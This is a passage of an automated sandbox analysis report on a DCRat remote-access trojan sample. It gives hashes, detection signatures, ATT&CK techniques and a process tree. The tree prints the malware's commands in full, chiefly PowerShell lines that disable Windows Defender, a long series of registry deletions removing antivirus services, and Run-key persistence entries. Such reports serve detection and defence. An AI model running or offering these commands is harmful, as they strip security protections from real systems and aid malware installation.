dcrat | d761a88913fad6d95dac4066c62bcc0eca249885051665c577c227c82b647e7f

Analysis

max time kernel
117s
max time network
121s
platform
windows7_x64
resource
win7-20221111-en
resource tags

arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
submitted
29-01-2023 21:30

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

d761a88913fad6d95dac4066c62bcc0eca249885051665c577c227c82b647e7f.exe
Size

3.7MB
MD5

780f599c1b1d73874aa554dca1624d29
SHA1

123ab47813fdb8ba9767250645b8126f76e0144c
SHA256

d761a88913fad6d95dac4066c62bcc0eca249885051665c577c227c82b647e7f
SHA512

7c3f4e0186b7f7a64c757137ca571ceb035906fc9bcfceec5d6ed98774be205e6fbdf2f2f9903505bc867caab3ed698dbe7b8ae4f8e186ce1cb9d6c724c85913
SSDEEP

98304:Db+bYAh4UJyYoWSLluElOXdgSDKLpNU8XcBptKSWZ:DqEAhhJDCLsCADK9NU8sBbKVZ

Score

10^/10

dcrat evasion infostealer persistence rat trojan

Malware Config

Signatures

Contains code to disable Windows Defender 4 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

Processes:

resource	yara_rule
\Users\Admin\AppData\Roaming\1337\Disable-Windows-Defender.exe	disable_win_def
C:\Users\Admin\AppData\Roaming\1337\Disable-Windows-Defender.exe	disable_win_def
C:\Users\Admin\AppData\Roaming\1337\Disable-Windows-Defender.exe	disable_win_def
behavioral1/memory/640-121-0x0000000000230000-0x0000000000238000-memory.dmp	disable_win_def

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat

Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

Processes:

Disable-Windows-Defender.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Disable-Windows-Defender.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	Disable-Windows-Defender.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	Disable-Windows-Defender.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	Disable-Windows-Defender.exe

DCRat payload 3 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

Processes:

resource	yara_rule
\dhcpsaves\dllsession.exe	dcrat
behavioral1/memory/2236-205-0x0000000000210000-0x0000000000274000-memory.dmp	dcrat
behavioral1/memory/2256-280-0x00000000013E0000-0x0000000001444000-memory.dmp	dcrat

Executes dropped EXE 13 IoCs

Processes:

7z.exe7z.exe7z.exe7z.exe7z.exe7z.exeDesktop.exeAAV (2).exeDisable-Windows-Defender.exeDCRatBuild.exePW2a6TXDXnEuQpMxlOaX.exedllsession.exeIdle.exe

pid	process
524	7z.exe
1688	7z.exe
1684	7z.exe
1992	7z.exe
1504	7z.exe
1620	7z.exe
964	Desktop.exe
844	AAV (2).exe
640	Disable-Windows-Defender.exe
1780	DCRatBuild.exe
1616	PW2a6TXDXnEuQpMxlOaX.exe
2236	dllsession.exe
2256	Idle.exe

Loads dropped DLL 24 IoCs

Processes:

cmd.exe7z.exe7z.exe7z.exe7z.exe7z.exe7z.exeDesktop.exeAAV (2).execmd.execmd.exe

pid	process
472	cmd.exe
524	7z.exe
472	cmd.exe
1688	7z.exe
472	cmd.exe
1684	7z.exe
472	cmd.exe
1992	7z.exe
472	cmd.exe
1504	7z.exe
472	cmd.exe
1620	7z.exe
472	cmd.exe
964	Desktop.exe
964	Desktop.exe
964	Desktop.exe
964	Desktop.exe
844	AAV (2).exe
844	AAV (2).exe
964	Desktop.exe
964	Desktop.exe
964	Desktop.exe
1444	cmd.exe
2092	cmd.exe

Adds Run key to start application 2 TTPs 7 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

dllsession.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\ProgramData\\Favorites\\explorer.exe\""	dllsession.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Documents and Settings\\conhost.exe\""	dllsession.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Windows\CurrentVersion\Run\Idle = "\"C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.es\\Idle.exe\""	dllsession.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Windows\\ja-JP\\lsass.exe\""	dllsession.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\dhcpsaves\\WmiPrvSE.exe\""	dllsession.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\dhcpsaves\\cmd.exe\""	dllsession.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Software\Microsoft\Windows\CurrentVersion\Run\Idle = "\"C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\fr\\Idle.exe\""	dllsession.exe

Checks for any installed AV software in registry 1 TTPs 6 IoCs

Security Software Discovery

T1063

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\McProxy	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\QHActiveDefense	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\avast! Antivirus	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\AntiVirService	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\AVP18.0.0	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\McAPExe	reg.exe

Drops file in Program Files directory 2 IoCs

Processes:

dllsession.exe

description	ioc	process
File created	C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fr\Idle.exe	dllsession.exe
File created	C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fr\6ccacd8608530fba3a93e87ae2225c7032aa18c1	dllsession.exe

Drops file in Windows directory 2 IoCs

Processes:

dllsession.exe

description	ioc	process
File created	C:\Windows\ja-JP\6203df4a6bafc7c328ee7f6f8ca0a8a838a8a1b9	dllsession.exe
File created	C:\Windows\ja-JP\lsass.exe	dllsession.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

NSIS installer 12 IoCs

installer

Processes:

resource	yara_rule
\Users\Admin\AppData\Local\Temp\RarSFX1\AAV (2).exe	nsis_installer_1
\Users\Admin\AppData\Local\Temp\RarSFX1\AAV (2).exe	nsis_installer_2
\Users\Admin\AppData\Local\Temp\RarSFX1\AAV (2).exe	nsis_installer_1
\Users\Admin\AppData\Local\Temp\RarSFX1\AAV (2).exe	nsis_installer_2
\Users\Admin\AppData\Local\Temp\RarSFX1\AAV (2).exe	nsis_installer_1
\Users\Admin\AppData\Local\Temp\RarSFX1\AAV (2).exe	nsis_installer_2
\Users\Admin\AppData\Local\Temp\RarSFX1\AAV (2).exe	nsis_installer_1
\Users\Admin\AppData\Local\Temp\RarSFX1\AAV (2).exe	nsis_installer_2
C:\Users\Admin\AppData\Local\Temp\RarSFX1\AAV (2).exe	nsis_installer_1
C:\Users\Admin\AppData\Local\Temp\RarSFX1\AAV (2).exe	nsis_installer_2
C:\Users\Admin\AppData\Local\Temp\RarSFX1\AAV (2).exe	nsis_installer_1
C:\Users\Admin\AppData\Local\Temp\RarSFX1\AAV (2).exe	nsis_installer_2

Creates scheduled task(s) 1 TTPs 7 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

784 schtasks.exe
1980 schtasks.exe
2080 schtasks.exe
2176 schtasks.exe
2228 schtasks.exe
1556 schtasks.exe
1820 schtasks.exe

pid	process
784	schtasks.exe
1980	schtasks.exe
2080	schtasks.exe
2176	schtasks.exe
2228	schtasks.exe
1556	schtasks.exe
1820	schtasks.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedllsession.exeIdle.exe

pid	process
844	powershell.exe
1540	powershell.exe
1948	powershell.exe
872	powershell.exe
1660	powershell.exe
280	powershell.exe
1976	powershell.exe
1688	powershell.exe
1524	powershell.exe
1684	powershell.exe
2236	dllsession.exe
2256	Idle.exe

Suspicious use of AdjustPrivilegeToken 36 IoCs

Processes:

7z.exe7z.exe7z.exe7z.exe7z.exe7z.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedllsession.exeIdle.exe

description	pid	process
Token: SeRestorePrivilege	524	7z.exe
Token: 35	524	7z.exe
Token: SeSecurityPrivilege	524	7z.exe
Token: SeSecurityPrivilege	524	7z.exe
Token: SeRestorePrivilege	1688	7z.exe
Token: 35	1688	7z.exe
Token: SeSecurityPrivilege	1688	7z.exe
Token: SeSecurityPrivilege	1688	7z.exe
Token: SeRestorePrivilege	1684	7z.exe
Token: 35	1684	7z.exe
Token: SeSecurityPrivilege	1684	7z.exe
Token: SeSecurityPrivilege	1684	7z.exe
Token: SeRestorePrivilege	1992	7z.exe
Token: 35	1992	7z.exe
Token: SeSecurityPrivilege	1992	7z.exe
Token: SeSecurityPrivilege	1992	7z.exe
Token: SeRestorePrivilege	1504	7z.exe
Token: 35	1504	7z.exe
Token: SeSecurityPrivilege	1504	7z.exe
Token: SeSecurityPrivilege	1504	7z.exe
Token: SeRestorePrivilege	1620	7z.exe
Token: 35	1620	7z.exe
Token: SeSecurityPrivilege	1620	7z.exe
Token: SeSecurityPrivilege	1620	7z.exe
Token: SeDebugPrivilege	844	powershell.exe
Token: SeDebugPrivilege	1540	powershell.exe
Token: SeDebugPrivilege	1948	powershell.exe
Token: SeDebugPrivilege	872	powershell.exe
Token: SeDebugPrivilege	1660	powershell.exe
Token: SeDebugPrivilege	280	powershell.exe
Token: SeDebugPrivilege	1976	powershell.exe
Token: SeDebugPrivilege	1688	powershell.exe
Token: SeDebugPrivilege	1524	powershell.exe
Token: SeDebugPrivilege	1684	powershell.exe
Token: SeDebugPrivilege	2236	dllsession.exe
Token: SeDebugPrivilege	2256	Idle.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

d761a88913fad6d95dac4066c62bcc0eca249885051665c577c227c82b647e7f.execmd.exeDesktop.exeAAV (2).execmd.exeDCRatBuild.exe

description	pid	process	target process
PID 1288 wrote to memory of 472	1288	d761a88913fad6d95dac4066c62bcc0eca249885051665c577c227c82b647e7f.exe	cmd.exe
PID 1288 wrote to memory of 472	1288	d761a88913fad6d95dac4066c62bcc0eca249885051665c577c227c82b647e7f.exe	cmd.exe
PID 1288 wrote to memory of 472	1288	d761a88913fad6d95dac4066c62bcc0eca249885051665c577c227c82b647e7f.exe	cmd.exe
PID 1288 wrote to memory of 472	1288	d761a88913fad6d95dac4066c62bcc0eca249885051665c577c227c82b647e7f.exe	cmd.exe
PID 472 wrote to memory of 1924	472	cmd.exe	mode.com
PID 472 wrote to memory of 1924	472	cmd.exe	mode.com
PID 472 wrote to memory of 1924	472	cmd.exe	mode.com
PID 472 wrote to memory of 1924	472	cmd.exe	mode.com
PID 472 wrote to memory of 524	472	cmd.exe	7z.exe
PID 472 wrote to memory of 524	472	cmd.exe	7z.exe
PID 472 wrote to memory of 524	472	cmd.exe	7z.exe
PID 472 wrote to memory of 524	472	cmd.exe	7z.exe
PID 472 wrote to memory of 1688	472	cmd.exe	7z.exe
PID 472 wrote to memory of 1688	472	cmd.exe	7z.exe
PID 472 wrote to memory of 1688	472	cmd.exe	7z.exe
PID 472 wrote to memory of 1688	472	cmd.exe	7z.exe
PID 472 wrote to memory of 1684	472	cmd.exe	7z.exe
PID 472 wrote to memory of 1684	472	cmd.exe	7z.exe
PID 472 wrote to memory of 1684	472	cmd.exe	7z.exe
PID 472 wrote to memory of 1684	472	cmd.exe	7z.exe
PID 472 wrote to memory of 1992	472	cmd.exe	7z.exe
PID 472 wrote to memory of 1992	472	cmd.exe	7z.exe
PID 472 wrote to memory of 1992	472	cmd.exe	7z.exe
PID 472 wrote to memory of 1992	472	cmd.exe	7z.exe
PID 472 wrote to memory of 1504	472	cmd.exe	7z.exe
PID 472 wrote to memory of 1504	472	cmd.exe	7z.exe
PID 472 wrote to memory of 1504	472	cmd.exe	7z.exe
PID 472 wrote to memory of 1504	472	cmd.exe	7z.exe
PID 472 wrote to memory of 1620	472	cmd.exe	7z.exe
PID 472 wrote to memory of 1620	472	cmd.exe	7z.exe
PID 472 wrote to memory of 1620	472	cmd.exe	7z.exe
PID 472 wrote to memory of 1620	472	cmd.exe	7z.exe
PID 472 wrote to memory of 1220	472	cmd.exe	attrib.exe
PID 472 wrote to memory of 1220	472	cmd.exe	attrib.exe
PID 472 wrote to memory of 1220	472	cmd.exe	attrib.exe
PID 472 wrote to memory of 1220	472	cmd.exe	attrib.exe
PID 472 wrote to memory of 964	472	cmd.exe	Desktop.exe
PID 472 wrote to memory of 964	472	cmd.exe	Desktop.exe
PID 472 wrote to memory of 964	472	cmd.exe	Desktop.exe
PID 472 wrote to memory of 964	472	cmd.exe	Desktop.exe
PID 964 wrote to memory of 844	964	Desktop.exe	AAV (2).exe
PID 964 wrote to memory of 844	964	Desktop.exe	AAV (2).exe
PID 964 wrote to memory of 844	964	Desktop.exe	AAV (2).exe
PID 964 wrote to memory of 844	964	Desktop.exe	AAV (2).exe
PID 844 wrote to memory of 640	844	AAV (2).exe	Disable-Windows-Defender.exe
PID 844 wrote to memory of 640	844	AAV (2).exe	Disable-Windows-Defender.exe
PID 844 wrote to memory of 640	844	AAV (2).exe	Disable-Windows-Defender.exe
PID 844 wrote to memory of 640	844	AAV (2).exe	Disable-Windows-Defender.exe
PID 844 wrote to memory of 1636	844	AAV (2).exe	cmd.exe
PID 844 wrote to memory of 1636	844	AAV (2).exe	cmd.exe
PID 844 wrote to memory of 1636	844	AAV (2).exe	cmd.exe
PID 844 wrote to memory of 1636	844	AAV (2).exe	cmd.exe
PID 964 wrote to memory of 1780	964	Desktop.exe	DCRatBuild.exe
PID 964 wrote to memory of 1780	964	Desktop.exe	DCRatBuild.exe
PID 964 wrote to memory of 1780	964	Desktop.exe	DCRatBuild.exe
PID 964 wrote to memory of 1780	964	Desktop.exe	DCRatBuild.exe
PID 1636 wrote to memory of 1972	1636	cmd.exe	reg.exe
PID 1636 wrote to memory of 1972	1636	cmd.exe	reg.exe
PID 1636 wrote to memory of 1972	1636	cmd.exe	reg.exe
PID 1636 wrote to memory of 1972	1636	cmd.exe	reg.exe
PID 1780 wrote to memory of 972	1780	DCRatBuild.exe	WScript.exe
PID 1780 wrote to memory of 972	1780	DCRatBuild.exe	WScript.exe
PID 1780 wrote to memory of 972	1780	DCRatBuild.exe	WScript.exe
PID 1780 wrote to memory of 972	1780	DCRatBuild.exe	WScript.exe

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exe

pid process

1220 attrib.exe

pid	process
1220	attrib.exe

C:\Users\Admin\AppData\Local\Temp\d761a88913fad6d95dac4066c62bcc0eca249885051665c577c227c82b647e7f.exe
"C:\Users\Admin\AppData\Local\Temp\d761a88913fad6d95dac4066c62bcc0eca249885051665c577c227c82b647e7f.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1288

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\main.bat" "
2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:472

C:\Windows\SysWOW64\mode.com
mode 65,10
3⤵
PID:1924

C:\Users\Admin\AppData\Local\Temp\RarSFX0\7z.exe
7z.exe e file.zip -p___________8671pwd22757pwd24019___________ -oextracted
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:524

C:\Users\Admin\AppData\Local\Temp\RarSFX0\7z.exe
7z.exe e extracted/file_5.zip -oextracted
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1688

C:\Users\Admin\AppData\Local\Temp\RarSFX0\7z.exe
7z.exe e extracted/file_4.zip -oextracted
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1684

C:\Users\Admin\AppData\Local\Temp\RarSFX0\7z.exe
7z.exe e extracted/file_3.zip -oextracted
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1992

C:\Users\Admin\AppData\Local\Temp\RarSFX0\7z.exe
7z.exe e extracted/file_2.zip -oextracted
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1504

C:\Users\Admin\AppData\Local\Temp\RarSFX0\7z.exe
7z.exe e extracted/file_1.zip -oextracted
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1620

C:\Windows\SysWOW64\attrib.exe
attrib +H "Desktop.exe"
3⤵
- Views/modifies file attributes
PID:1220

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Desktop.exe
"Desktop.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:964

C:\Users\Admin\AppData\Local\Temp\RarSFX1\AAV (2).exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\AAV (2).exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:844

C:\Users\Admin\AppData\Roaming\1337\Disable-Windows-Defender.exe
"C:\Users\Admin\AppData\Roaming\1337\Disable-Windows-Defender.exe"
5⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
PID:640

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1540

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBehaviorMonitoring $true
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:872

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1976

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1684

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1948

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1660

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1524

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1688

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent Never
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:844

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:280

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Roaming\1337\antiav.bat" "
5⤵
- Suspicious use of WriteProcessMemory
PID:1636

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE2.0.0" /f
6⤵
PID:1972

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE1.0.0" /f
6⤵
PID:1484

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP18.0.0" /f
6⤵
- Checks for any installed AV software in registry
PID:564

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP17.0.0" /f
6⤵
PID:1356

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP16.0.0" /f
6⤵
PID:1708

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP15.0.0" /f
6⤵
PID:1776

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP14.0.0" /f
6⤵
PID:580

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP13.0.0" /f
6⤵
PID:1292

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP12.0.0" /f
6⤵
PID:708

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP11.0.0" /f
6⤵
PID:560

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP10.0.0" /f
6⤵
PID:1496

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MBAMService" /f
6⤵
PID:1992

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAWFwk" /f
6⤵
PID:1592

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MSK80Service" /f
6⤵
PID:612

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAPExe" /f
6⤵
- Checks for any installed AV software in registry
PID:1644

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McBootDelayStartSvc" /f
6⤵
PID:1876

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mccspsvc" /f
6⤵
PID:1048

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfefire" /f
6⤵
PID:1380

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\HomeNetSvc" /f
6⤵
PID:2004

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ModuleCoreService" /f
6⤵
PID:1040

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McMPFSvc" /f
6⤵
PID:848

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mcpltsvc" /f
6⤵
PID:436

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McProxy" /f
6⤵
- Checks for any installed AV software in registry
PID:1488

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McODS" /f
6⤵
PID:1932

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfemms" /f
6⤵
PID:1216

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAfee SiteAdvisor Service" /f
6⤵
PID:1972

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfevtp" /f
6⤵
PID:912

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McNaiAnn" /f
6⤵
PID:1412

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\nanosvc" /f
6⤵
PID:1524

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\NortonSecurity" /f
6⤵
PID:1160

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\!SASCORE" /f
6⤵
PID:1924

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\SBAMSvc" /f
6⤵
PID:576

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVAuxSvc" /f
6⤵
PID:1704

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVCoreSvc" /f
6⤵
PID:1624

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\QHActiveDefense" /f
6⤵
- Checks for any installed AV software in registry
PID:2020

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus" /f
6⤵
- Checks for any installed AV software in registry
PID:1688

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Firewall" /f
6⤵
PID:560

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVG Antivirus" /f
6⤵
PID:596

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirMailService" /f
6⤵
PID:1496

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirService" /f
6⤵
- Checks for any installed AV software in registry
PID:1504

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\Avira.ServiceHost" /f
6⤵
PID:900

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirWebService" /f
6⤵
PID:612

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirSchedulerService" /f
6⤵
PID:1548

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsservppl" /f
6⤵
PID:1620

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ProductAgentService" /f
6⤵
PID:1648

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsserv" /f
6⤵
PID:1136

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\updatesrv" /f
6⤵
PID:1360

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdvirth" /f
6⤵
PID:1860

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdAgent" /f
6⤵
PID:436

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\DragonUpdater" /f
6⤵
PID:1924

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ekrn" /f
6⤵
PID:1092

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\0247141531883172mcinstcleanup" /f
6⤵
PID:596

C:\Windows\SysWOW64\reg.exe
Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\PEFService" /f
6⤵
PID:612

C:\Windows\SysWOW64\reg.exe
